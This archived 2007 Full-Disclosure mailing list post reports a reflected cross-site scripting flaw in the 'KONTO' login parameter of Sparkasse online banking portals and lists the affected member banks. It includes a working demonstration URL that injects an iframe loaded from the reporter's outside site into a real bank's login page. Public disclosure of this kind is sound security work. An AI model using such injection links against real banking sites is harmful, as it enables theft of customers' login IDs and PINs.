lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <464BD542.3030204@der-keiler.de>
Date: Thu, 17 May 2007 06:08:34 +0200
From: Ulrich Keil <full-disclosure@...-keiler.de>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS vulnerability on various german online
	banking sites (sparkasse)

The "Sparkassen-Finanzgruppe" with a transaction volume of over 3.300 
billion euro is one of the largest banks for private customers in 
germany. Many local member-banks of the group use the online banking 
portal provided by sfze (http://www.sfze.de/), a subsidiary company of 
Sparkassen-Finanzgruppe.

Vulnerability:
The online banking software of sfze does not check the HTTP GET 
Parameter "KONTO" on the login page, and displays the content of this 
variable without modification within the html form area.

Impact:
An attacker may gather login data (ID+PIN) from customers of the 
Sparkassen-Finanzgruppe by tricking them to click on a special crafted 
link, which points to the original login page of the online banking system.

Demonstration:
The following trivial example demonstrates the impact of this 
vulnerability by extending the login form with an iframe:
https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected 
by this vulerability:
-Sparkasse Donnersberg
-Sparkasse Ludwigshafen
-Sparkasse KölnBonn
-Sparkasse Aachen
-Frankfurter Sparkasse
-Sparkasse Rhein Neckar Nord

Ulrich Keil
-- 
http://www.derkeiler.com
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831  CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.derkeiler.com/uk/pgp-key.asc

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ